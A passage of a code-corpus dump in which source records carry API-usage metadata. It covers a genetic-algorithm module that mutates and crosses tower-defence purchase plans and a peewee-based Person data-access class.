"line_number": 141, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 141, "usage_type": "name"}, {"api_name": "models.Collateral.objects.filter", "line_number": 147, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 147, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 147, "usage_type": "name"}, {"api_name": "models.Collateral.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Collateral.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.Collateral", "line_number": 150, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 166, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 166, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 167, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 170, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 170, "usage_type": "name"}, {"api_name": "models.Camp", "line_number": 171, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 178, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 183, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 183, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 184, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 188, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 193, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 197, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 197, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 198, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Camp", "line_number": 203, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 206, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 211, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 214, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 214, "usage_type": "name"}, {"api_name": "models.Stage", "line_number": 215, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 218, "usage_type": "call"}, {"api_name": "models.Stage", "line_number": 218, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 220, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 224, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 229, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 229, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 230, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 235, "usage_type": "call"}, {"api_name": "models.Stage", "line_number": 235, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 238, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 243, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 246, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 246, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 247, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 250, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 250, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 251, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 256, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 256, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 258, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 262, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 265, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 265, "usage_type": "name"}, {"api_name": "models.Task", "line_number": 266, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 269, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 269, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 271, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 275, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 280, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 280, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 281, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 286, "usage_type": "call"}, {"api_name": "models.Task", "line_number": 286, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 289, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 294, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 297, "usage_type": "name"}, {"api_name": "django.views.generic.detail.DetailView", "line_number": 297, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 298, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 301, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 301, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 302, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 306, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 306, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 308, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 312, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 315, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 315, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 316, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 319, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 319, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 321, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 325, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 329, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 329, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 333, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 337, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 337, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 341, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 345, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 345, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 346, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 352, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 352, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 356, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 361, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 365, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 365, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 366, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 372, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 372, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 376, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 381, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 385, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 385, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 386, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 396, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 401, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 405, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 405, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 406, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 413, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 417, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 421, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 421, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 422, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 429, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 433, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 437, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 437, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 438, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 445, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 449, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 453, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 453, "usage_type": "name"}, {"api_name": "models.Collateral", "line_number": 454, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 457, "usage_type": "call"}, {"api_name": "models.Collateral", "line_number": 457, "usage_type": "argument"}, {"api_name": "django.http.Http404", "line_number": 459, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 463, "usage_type": "call"}]} +{"seq_id": "36753525004", "text": "# BO 2021\n# Authors: Łukasz Kita, Mateusz Pawłowicz, Michał Szczepaniak, Marcin Zięba\n\"\"\"\nTower Defence Solver.\n\nGenetic operations.\n\"\"\"\nimport copy\nimport numpy as np\nimport tower_defence_solver.utils as utils\nfrom tower_defence_solver.candidate import Candidate\nfrom tower_defence_solver import TowerDefenceSolver\nfrom typing import List, Dict, Tuple, Optional, Union\n\nPurchases = List[Dict]\nMAX_TRIES = 10\n\n\n# ========== UNARY OPERATORS ==========\n\n\ndef addition(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list\n concatenated with additional single purchase.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with newly added purchase if possible, None otherwise\n \"\"\"\n time = origin.time\n new_purchases = copy.deepcopy(origin.initial_purchases)\n position = utils.get_random_position_near_path(\n game, game.map_height // 2, game.map_width // 2, origin.initial_purchases, game.map_height * game.map_width\n )\n if position is None:\n return None\n tower_id = np.random.choice(list(game.tower_types.keys()))\n to_be_added = {\"time\": utils.get_random_purchase_time(time), \"coords\": position, \"type\": tower_id}\n new_purchases.append(to_be_added)\n new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n return Candidate(new_purchases, game, time=time)\n\n\ndef deletion(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list, but with one purchase missing\n The purchase to be deleted is taken from these purchases, which had a chance to be done,\n but if there are no such a purchases, it will be randomly taken from the whole purchases list.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with delete purchase if possible, None otherwise\n \"\"\"\n time = origin.time\n (\n purchases_before_simulation_has_finished,\n purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n if purchases_before_simulation_has_finished is None:\n return None\n\n id_to_be_removed = np.random.choice(len(purchases_before_simulation_has_finished))\n new_purchases = purchases_before_simulation_has_finished.copy()\n new_purchases.pop(id_to_be_removed)\n new_purchases.extend(purchases_after_simulation_has_finished)\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef permutation(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list, but with time\n of random two purchases being replaced.\n The permutated purchases are taken from these purchases, which had a chance to be done,\n but in case there is not enough of them, they will be randomly taken from the whole purchases list.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with permutated two purchases if possible, None otherwise\n \"\"\"\n time = origin.time\n (\n purchases_before_simulation_has_finished,\n purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, origin.initial_purchases)\n\n if purchases_before_simulation_has_finished is None:\n return None\n\n first_id = np.random.choice(len(purchases_before_simulation_has_finished))\n second_id = first_id\n\n while second_id == first_id:\n second_id = np.random.choice(len(purchases_before_simulation_has_finished))\n\n new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n new_purchases[first_id][\"coords\"], new_purchases[second_id][\"coords\"] = (\n new_purchases[second_id][\"coords\"],\n new_purchases[first_id][\"coords\"],\n )\n\n new_purchases[first_id][\"type\"], new_purchases[second_id][\"type\"] = (\n new_purchases[second_id][\"type\"],\n new_purchases[first_id][\"type\"],\n )\n\n new_purchases.extend(purchases_after_simulation_has_finished)\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef time_translation(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list, but with time of one random\n purchase being changed.\n The chosen purchase can be as well postponed as preponed.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with one purchase translated in time if possible, None otherwise\n \"\"\"\n time = origin.time\n\n (\n purchases_before_simulation_has_finished,\n purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n if purchases_before_simulation_has_finished is None:\n return None\n\n id_to_be_translated = np.random.choice(len(purchases_before_simulation_has_finished))\n new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n purchase = copy.deepcopy(new_purchases.pop(id_to_be_translated))\n new_purchase_time = max(purchase.get(\"time\") + np.random.standard_cauchy() * 0.5, 1)\n new_purchases.extend(purchases_after_simulation_has_finished)\n\n purchase[\"time\"] = int(new_purchase_time)\n new_purchases.append(purchase)\n new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef replace_tower_with_another(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list the same as origin's purchase list, but with one extra purchase made\n in place of other already existing (selling mechanic).\n The created purchase can be as well postponed as preponed.\n\n :param game: Instance of tower defence emulator\n :param origin: candidate, on whose purchases list new candidate purchased will be based on\n :return: candidate with one purchase translated in time if possible, None otherwise\n \"\"\"\n time = origin.time\n (\n purchases_before_simulation_has_finished,\n purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n if purchases_before_simulation_has_finished is None:\n return None\n\n id_to_be_translated = np.random.choice(len(purchases_before_simulation_has_finished))\n new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n purchase = copy.deepcopy(new_purchases[id_to_be_translated])\n current_type = purchase[\"type\"]\n\n new_purchase_time = purchase.get(\"time\") + 5 + utils.get_random_initial_purchase_time(0.2)\n new_purchases.extend(purchases_after_simulation_has_finished)\n\n purchase[\"time\"] = int(new_purchase_time)\n purchase[\"type\"] = np.random.choice([tower[0] for tower in game.tower_types.items()\n if tower[1][\"cost\"] >= game.tower_types[current_type][\"cost\"]])\n new_purchases.append(purchase)\n new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n\n return Candidate(new_purchases, game, time=time)\n\n\n# ========== BINARY OPERATORS ==========\n\n\ndef cross(game: TowerDefenceSolver, parent_a: Candidate, parent_b: Candidate) -> Optional[Candidate]:\n \"\"\"\n Returns candidate with purchases list being the combination of parents' purchases list.\n The purchases list of the newly created candidate is the purchases list of the first parent, with\n some sequence of orders being replaced with the sequence derived from the second parent.\n The sequences are tried to be taken from these purchases which had a chance to be done, but if there are\n not enough of them they will be taken from the whole purchases list.\n\n :param game: Instance of tower defence emulator\n :param parent_a: first parent\n :param parent_b: second parent\n :return: candidate with purchases being the combination of parents' purchases if possible, None otherwise\n \"\"\"\n time = parent_a.time\n (\n parent_a_purchases_before_simulation_has_finished,\n parent_a_purchases_after_simulation_has_finished,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, parent_a.initial_purchases)\n\n if parent_a_purchases_before_simulation_has_finished is None:\n return None\n\n (\n parent_b_purchases_before_simulation_has_finished,\n _,\n ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, parent_b.initial_purchases)\n\n if parent_b_purchases_before_simulation_has_finished is None:\n return None\n\n a_starting_point, a_ending_point = get_split_points(parent_a_purchases_before_simulation_has_finished)\n new_purchases = copy.deepcopy(parent_a_purchases_before_simulation_has_finished)\n\n for i in range(a_starting_point, a_ending_point):\n new_purchases.pop(a_starting_point)\n\n new_purchases.extend(parent_a_purchases_after_simulation_has_finished)\n new_purchases_copy = copy.deepcopy(new_purchases)\n was_everything_added = False\n how_many_tries = 0\n\n while not was_everything_added and how_many_tries < MAX_TRIES:\n new_purchases = copy.deepcopy(new_purchases_copy)\n b_starting_point, b_ending_point = get_split_points(parent_b_purchases_before_simulation_has_finished)\n was_everything_added = True\n\n for i in range(b_starting_point, b_ending_point):\n purchase_to_be_added = parent_b_purchases_before_simulation_has_finished[i]\n purchase_coords = purchase_to_be_added[\"coords\"]\n\n if not utils.validate_pos(game, purchase_coords, new_purchases):\n was_everything_added = False\n break\n\n new_purchases.append(purchase_to_be_added)\n how_many_tries += 1\n\n if how_many_tries >= MAX_TRIES:\n return None\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef get_split_points(purchases: Purchases) -> Tuple[int, int]:\n \"\"\"\n Finds indexes allowing the split of the purchases list into three parts\n\n :param purchases: list of purchases\n :return: two different indexes indicating points in time which could be\n used to cut a part of the given purchases list\n \"\"\"\n first_id = np.random.choice(len(purchases))\n second_id = first_id\n\n while second_id == first_id:\n second_id = np.random.choice(len(purchases))\n\n starting_point = min(first_id, second_id)\n ending_point = max(first_id, second_id)\n\n return starting_point, ending_point\n\n\ndef split_purchases_into_minimum_n_elements_at_given_point_in_time(\n n: int, time: int, purchases: Purchases\n) -> Union[Tuple[Purchases, Purchases], Tuple[None, None]]:\n \"\"\"\n Splits the given purchases list into two parts in the given point of time,\n with the first part consisting of at least n elements.\n\n :param n: number of elements which must be in the first part of the split list\n :param time: point in time\n :param purchases: list of purchases\n :return: tuple consisting of two parts of the split list if possible, None otherwise\n \"\"\"\n if len(purchases) < n:\n return None, None\n\n purchases_before_time = list(filter(lambda purchase: purchase.get(\"time\") < time, purchases))\n purchases_after_time = list(filter(lambda purchase: purchase.get(\"time\") >= time, purchases))\n\n if len(purchases_before_time) < n:\n purchases_before_time = purchases\n purchases_after_time = []\n\n return purchases_before_time, purchases_after_time\n\n\nUNARY_REPRODUCTION = [addition, deletion, permutation, time_translation, replace_tower_with_another]\nBINARY_REPRODUCTION = [cross]\n\n\ndef reproduction(game: TowerDefenceSolver, candidates: List[Candidate], how_many_to_add: int,\n weighted_by: str = None) -> List[Candidate]:\n \"\"\"\n Reproduce the provided candidates by the given amount.\n\n\n :param game:\n :param candidates:\n :param how_many_to_add:\n :param weighted_by: 'order' - weighted by order in list of candidates sorted by survival time,\n 'time' - weighted by survival time, None - uniform\n :return:\n \"\"\"\n how_many_added = 0\n\n while how_many_added != how_many_to_add:\n candidates = sorted(candidates, key=lambda candidate: candidate.time)\n if weighted_by == 'order':\n order_range = np.arange(len(candidates), 0, -1)\n probability_distribution = order_range / np.sum(order_range)\n elif weighted_by == 'time':\n times_array = np.array(list(map(lambda candidate: candidate.time, candidates)))\n probability_distribution = times_array / np.sum(times_array)\n else:\n probability_distribution = None\n\n x = np.random.choice([0, 1], p=game.p_binary)\n is_binary = x == 1\n is_unary = x == 0\n if is_binary:\n\n parent_a = np.random.choice(candidates, p=probability_distribution)\n parent_b = parent_a\n\n while parent_b == parent_a:\n parent_b = np.random.choice(candidates, p=probability_distribution)\n\n operator = np.random.choice(BINARY_REPRODUCTION, p=game.p_binary_ops)\n\n element_to_add = operator(game, parent_a, parent_b)\n\n if element_to_add is not None:\n candidates.append(element_to_add)\n how_many_added += 1\n\n elif is_unary:\n operator = np.random.choice(UNARY_REPRODUCTION, p=game.p_unary_ops)\n origin = np.random.choice(candidates, p=probability_distribution)\n element_to_add = operator(game, origin)\n if element_to_add is not None:\n candidates.append(element_to_add)\n how_many_added += 1\n\n return candidates\n", "repo_name": "marcinz99/TowerDefenceSolver", "sub_path": "tower_defence_solver/reproduction.py", "file_name": "reproduction.py", "file_ext": "py", "file_size_in_byte": 14319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 15, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 22, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 22, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.get_random_position_near_path", "line_number": 33, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.utils.get_random_purchase_time", "line_number": 39, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 39, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 42, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 22, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 45, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 69, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 45, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 72, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 98, "usage_type": "call"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 112, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 72, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 115, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 136, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random.standard_cauchy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 146, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 115, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 149, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 149, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 168, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 169, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 171, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.get_random_initial_purchase_time", "line_number": 174, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 178, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 149, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 189, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 189, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 226, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 231, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.validate_pos", "line_number": 239, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 239, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 249, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 189, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 260, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 264, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 274, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 301, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 301, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 301, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 327, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 336, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 338, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 347, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 348, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 302, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 302, "usage_type": "name"}]} +{"seq_id": "14651694318", "text": "from model.Person import Person, database\nfrom typing import Union, Optional\nfrom peewee import *\nimport numpy as np\n\n\nclass PersonDao:\n # CREATE\n @staticmethod\n def create_person_by_model(person):\n person.save()\n\n @staticmethod\n def create_person(first_name=None,\n last_name=None,\n patronymic=None,\n face_data=None,\n position=None,\n mail=None,\n filename=None) \\\n -> Optional[Person]:\n person = Person(position=position,\n last_name=last_name,\n first_name=first_name,\n patronymic=patronymic,\n face_data=face_data,\n mail=mail,\n filename=filename)\n person.save()\n return person\n\n # READ\n @staticmethod\n def get_person_by_id(identity: int) -> Optional[Person]:\n try:\n person = Person.get_by_id(identity)\n return person\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_person_by_lastname(lastname: str) -> Optional[list]:\n try:\n person_list = Person.select().where(Person.last_name == lastname).get()\n if isinstance(person_list, list):\n return person_list\n else:\n return [person_list]\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_person_by_fullname(fullname: str) -> Optional[list]:\n try:\n lastname, firstname, patronymic = fullname.split(' ')\n person_list = Person.select().where(Person.last_name == lastname,\n Person.first_name == firstname,\n Person.patronymic == patronymic).get()\n if not isinstance(person_list, list):\n person_list = [person_list]\n return person_list\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_all_persons_as_select(): # -> Optional[ModelSelect]\n return Person.select()\n\n @staticmethod\n def get_all_person_as_cursor():\n query = Person.select()\n return database.execute(query)\n\n # @staticmethod\n # def get_all_persons_as_dict() -> dict:\n # \treturn Person.select().dicts()\n\n # UPDATE\n # @staticmethod\n # def update_person_face_by_id(identity: int, **params):\n # try:\n # person = Person.get_by_id(identity)\n\n # DELETE\n @staticmethod\n def delete_person_by_id(i: int) -> bool:\n try:\n person = Person.get(Person.face_id == i)\n person.delete_instance()\n return True\n except DoesNotExist:\n return False\n\n", "repo_name": "nevermarine/backend857", "sub_path": 